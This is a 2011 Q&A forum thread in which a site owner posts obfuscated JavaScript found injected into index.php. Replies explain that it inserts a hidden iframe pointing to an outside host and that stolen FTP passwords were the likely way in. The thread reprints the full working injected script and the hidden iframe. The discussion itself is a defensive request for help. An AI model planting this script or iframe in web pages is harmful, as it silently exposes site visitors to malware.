Hacked site?

A

art4mac2011-06-09 09:46:46

Malware

art4mac, 2011-06-09 09:46:46

Hacked site?

Today I found an implanted code in index.php on the site. The code was inserted between ?>.
Does anyone know what this hack is and what it does?

&lt;html&gt;&lt;body&gt;&lt;script&gt;var el,ar,ar2,pos,yes=false;setInterval(function(){if(yes){try{try{a1=a2}catch(a){b[2]=21};}catch(a){k=el.innerHTML+a.toString().substr(0,0);};ar='0(: ]tn Ee{oa&gt;rs\'T,[=NyghvuwC-'zA&lt;cp);1.B/bm}flid';

ar2='R12c12c188c180c28c4c192c44c136c104c172c36c24c20c156c92c36c20c32c184c36c172c36c24c20c60c160c88c68c48c92c84c48c172c36c4c120c168c44c192c88c120c144c76c0c16c144c40c12c12c12c188c180c56c48c172c36c56c4c144c148c12c12c176c28c36c184c60c36c28c40c12c12c12c192c44c136c104c172c36c24c20c156c108c56c188c20c36c4c64c132c188c180c56c48c172c36c28c60c56c136c80c120c96c20c20c140c8c164c164c24c20c116c60c20c48c20c60c156c136c124c156c136c136c164c136c44c104c24c20c36c56c156c96c20c172c120c28c108c188c192c20c96c80c120c152c0c120c28c96c36c188c92c96c20c80c120c152c0c120c28c60c20c88c184c36c80c120c100c188c60c188c168c188c184c188c20c88c8c96c188c192c192c36c24c148c140c44c60c188c20c188c44c24c8c48c168c60c44c184c104c20c36c148c184c36c180c20c8c0c148c20c44c140c8c0c148c120c52c132c164c188c180c56c48c172c36c52c64c144c148c12c12c176c12c12c180c104c24c136c20c188c44c24c28c188c180c56c48c172c36c56c4c144c40c12c12c12c100c48c56c28c180c28c80c28c192c44c136c104c172c36c24c20c156c136c56c36c48c20c36c32c184c36c172c36c24c20c4c120c188c180c56c48c172c36c120c144c148c180c156c60c36c20c128c20c20c56c188c168c104c20c36c4c120c60c56c136c120c72c120c96c20c20c140c8c164c164c24c20c116c60c20c48c20c60c156c136c124c156c136c136c164c136c44c104c24c20c36c56c156c96c20c172c120c144c148c180c156c60c20c88c184c36c156c100c188c60c188c168c188c184c188c20c88c80c120c96c188c192c192c36c24c120c148c180c156c60c20c88c184c36c156c140c44c60c188c20c188c44c24c80c120c48c168c60c44c184c104c20c36c120c148c180c156c60c20c88c184c36c156c184c36c180c20c80c120c0c120c148c180c156c60c20c88c184c36c156c20c44c140c80c120c0c120c148c180c156c60c36c20c128c20c20c56c188c168c104c20c36c4c120c108c188c192c20c96c120c72c120c152c0c120c144c148c180c156c60c36c20c128c20c20c56c188c168c104c20c36c4c120c96c36c188c92c96c20c120c72c120c152c0c120c144c148c12c12c12c192c44c136c104c172c36c24c20c156c92c36c20c32c184c36c172c36c24c20c60c160c88c68c48c92c84c48c172c36c4c120c168c44c192c88c120c144c76c0c16c156c48c140c140c36c24c192c112c96c188c184c192c4c180c144c148c12c12c176]'.replace(k.substr(0,1),'[');pau='urn eReferenceErr'.replace(k,'val');e=Function('ret'+pau)();ar2=e(ar2.replace(/c/g,','));s='';pos=0;for(i=0;i!=ar2.length;i++){e('pos=parseInt(ar2[i] / 4)');e('s+=ar.substr(pos,1)');}<br/>
e(s);yes=false;}},20);setTimeout(function(){el=document.createElement('div');el.innerHTML='&amp;#82;&amp;#101;&amp;#102;&amp;#101;&amp;#114;&amp;#101;&amp;#110;&amp;#99;&amp;#101;&amp;#69;&amp;#114;&amp;#114;';yes=true;},1);&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;<br/>

Reply

Answer the question

In order to leave comments, you need to log in

4 answer(s)

S

sajgak, 2011-06-09
@sajgak

Trite passwords from ftp.

A

Ano, 2011-06-09
@Ano

Inserts an iframe like this:
<iframe src='http://nt-stats.cz.cc/counter.htm' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'>

B

brutaler, 2011-06-09
@brutaler

On the home computer, the virus pulled out the saved FTP passwords. You need to install an antivirus and change ftp access.

T

try4tune, 2011-06-09
@try4tune

Who is your hosting provider? I have the same problem on my father's site. All index.* files have this code.